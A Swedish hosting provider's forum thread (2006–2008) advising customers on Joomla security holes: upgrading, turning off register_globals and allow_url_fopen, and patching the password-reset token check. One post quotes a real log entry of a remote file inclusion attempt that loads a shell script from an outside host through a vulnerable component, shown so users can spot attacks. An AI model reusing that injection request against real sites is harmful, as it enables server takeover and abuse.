Joomla Säkerhetshål
#1
Postad 29 augusti 2006 - 15:23
Säkerhetshål har upptäckts, och vi uppmanar alla som använder Joomla att uppgradera omgående.
Vi har tvingats inaktivera vissa komponenter för vissa kunders Joomla-installtioner pga de utsatts för attacker.
(Dessa kunder har självklart kontaktats om detta)
Tyvärr finns inte denna senaste versionen ännu i Fantastico, men den bör komma under veckan hoppas vi.
Mer om detta finns att läsa här: http://www.joomla.or...t/view/1843/74/
#2
Postad 01 september 2006 - 21:30
Angående uppgraderingen så har jag gjort den men vad jag kan se på Joomlas forum så ska man ska ändra i PHP.INI för att säkerhetställa allt korrekt. Jag hittar ingen sån fil nånstans. Meddelandet som jag har kvar är enligt följande:
PHP register_globals setting is `ON` instead of `OFF` och det ska tydligen finnas i PHP.INI filen.
M.v.h.
Torbjörn Törnqvist
#3
Postad 01 september 2006 - 23:11
mtt på 1 September, 2006, 22:30 sade:
Angående uppgraderingen så har jag gjort den men vad jag kan se på Joomlas forum så ska man ska ändra i PHP.INI för att säkerhetställa allt korrekt. Jag hittar ingen sån fil nånstans. Meddelandet som jag har kvar är enligt följande:
PHP register_globals setting is `ON` instead of `OFF` och det ska tydligen finnas i PHP.INI filen.
M.v.h.
Torbjörn Törnqvist
Hej! Du skapar en fil med namnet "php.ini" själv. Tex. en textfil i "Anteckningar" som det heter i Windows.
Skicka upp den i mappen där Joomla är installerad.
Lägg sedan till raden:
register_globals = Off
Tänk på att samma fil med koden måste skickas upp i ALLA mappar Joomla använder för att "register_globals Off" ska gälla.
#4
Postad 03 september 2006 - 15:20
http://tips-scripts.com/?tip=php_ini
http://tips-scripts....ip=php_ini_copy
http://tips-scripts....=php_ini_delete
Läs tråden här --> http://forum.joomla....ic,75990.0.html
Detta gör att man sparar endel tid ;-)
#5
Postad 06 september 2006 - 12:21
#6
Postad 13 september 2006 - 07:58
#7
Postad 13 september 2006 - 17:54
Citat
Fantastico har den senaste Joomla versionen sedan den 6:e september.
För att få "register_globals = Off" att gälla för Joomla måste en php.ini fil finnas i samtliga mappar som Joomla använder.
Det är tyvärr inget Fantastico fixar.
#8
Postad 15 september 2006 - 11:31
Vi har under flera dagar tillbaka upplevt att dessa säkerhetshål har orsakat stora störningar såsom hög serverbelastning.
Vi har tvingats att temporärt suspendera de konton som orsakat dessa överbelastningar och därefter av-aktiverat det plugin som orsakade överbelastningen pga hackerförsöket via Pluginet.
Kontoägarna har självklarts meddelats detta.
Efter av-aktivering eller avinstallation(av kunden själv) av dessa plugins har kontonen åter aktiverats.
Ett av de mest förekommande är "ExtCalendar". Mer om detta finns i denna tråd:
http://forum.joomla.org/index.php/topic,75....html#msg402249
Vi vill be alla Joomla användare att se över den "Raw Access log" som Ni kan läsa via Er Cpanel.
Har Ni ovanligt många "GET" på en viss komponent/plugin från samma ip och ibland flera olika ip's men vid samma tillfälle så är det misstänkt ett hackerförsök.
Se efter om det finns uppgraderingar till de Plugins Ni använder och uppgradera omgående.
#9
Postad 23 september 2006 - 18:59
Filen finns placerad på följande länkväg. (Byt ut "kontonamn" till Ert och eventuella andra mappnamn där Er Joomla finns installerad)
/home/kontonamn/public_html/administrator/components/com_comprofiler/plugin.class.php
Var snäll och lägg in en php.ini fil i den mappen (com_comprofiler) också om Ni inte redan gjort det.
Och koden i den php.ini filen ska vara:
register_globals = Off allow_url_fopen = Off
Som Ni ser så vill vi att Ni även använder "allow_url_fopen =Off". Detta pga vi sett att filen kan utnyttjas annars för att öppna filer på andra servrar som sedan körs av Ert Joomla-script för att tex. skicka Spam eller andra elakheter.
Ett typiskt "anrop" kan vara:
217.148.176.200 - - [22/Sep/2006:05:09:28 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805"
I detta fallet blev det "404" eftersom filen inte finns längre eller att allow_url_fopen inte tillåter filen att öppnas.
#10
Postad 30 september 2006 - 17:34
Gör så här:
1. Logga in på Ftp eller via Cpanel's filhanterare.
2. Sök rätt på filen "globals.php" i mappen där Joomla finns installerad.
3. Välj att redigera filen.
4. På rad 24 där det står:
define( 'RG_EMULATION', 1 );
Ändra värdet 1 till 0 så att det ser ut så här istället:
define( 'RG_EMULATION', 0 );
5. Spara filen globals.php
Efter det är det klart.
#11
Postad 26 oktober 2006 - 10:59
Jag använder mig av ett lcms som heter ATutor. Då jag får lite error i Implodefunktionen har jag blivit anmodad att testa med register_globals off.
Om jag skriver ..register_globals off..enligt förslag i den här tråden, i .htaccess, uppstår internal server error. Hur skall jag göra?
Kan någon tipsa mig hur jag skall få register globals off utan internal server error?
Tack på förhand
#12
Postad 26 oktober 2006 - 20:43
Citat
En .htaccess-fil får ej innehålla regler för php - då blir det alltid "Internal Server Error" - det pga vi använder "phpsuexec" på alla våra servrar.
I början på denna tråd finns svaret Du söker:
Citat
Skicka upp den i mappen där Joomla är installerad.
Lägg sedan till raden:
register_globals = Off
Tänk på att samma fil med koden måste skickas upp i ALLA mappar Joomla använder för att "register_globals Off" ska gälla.
Mer om "phpsuexec" och allt det innebär hittar Du i denna tråden:
http://forum.psychof...p?showtopic=728
#13
Postad 14 augusti 2008 - 19:08
Joomla version 1.5.x fram till version 1.5.5 är drabbade av ett säkerhetshål.
Obehöriga personer kan resetta/återställa lösenordet för den första registrerade användaren (lägsta ID) vilket vanligtvis är administratorn.
Lösningen är att uppgradera Joomla till senaste versionen 1.5.6 eller redigera filen:
/components/com_user/models/reset.php
På linje 113 i filen reset.php efter global $mainframe; lägga till följande kod:
if(strlen($token) != 32) { $this->setError(JText::_('INVALID_TOKEN')); return false; }
Källa:
http://developer.joomla.org/security/news/...ctionality.html
#14
Postad 15 september 2008 - 22:01
http://www.joomla.org/announcements/releas...-available.html
Alla Joomla-användare bör uppgradera till version 1.5.7 omgående.
Flera säkerhetsluckor har åtgärdats i version 1.5.7. Det fanns 1 kritisk, 1 stor och 2 moderate.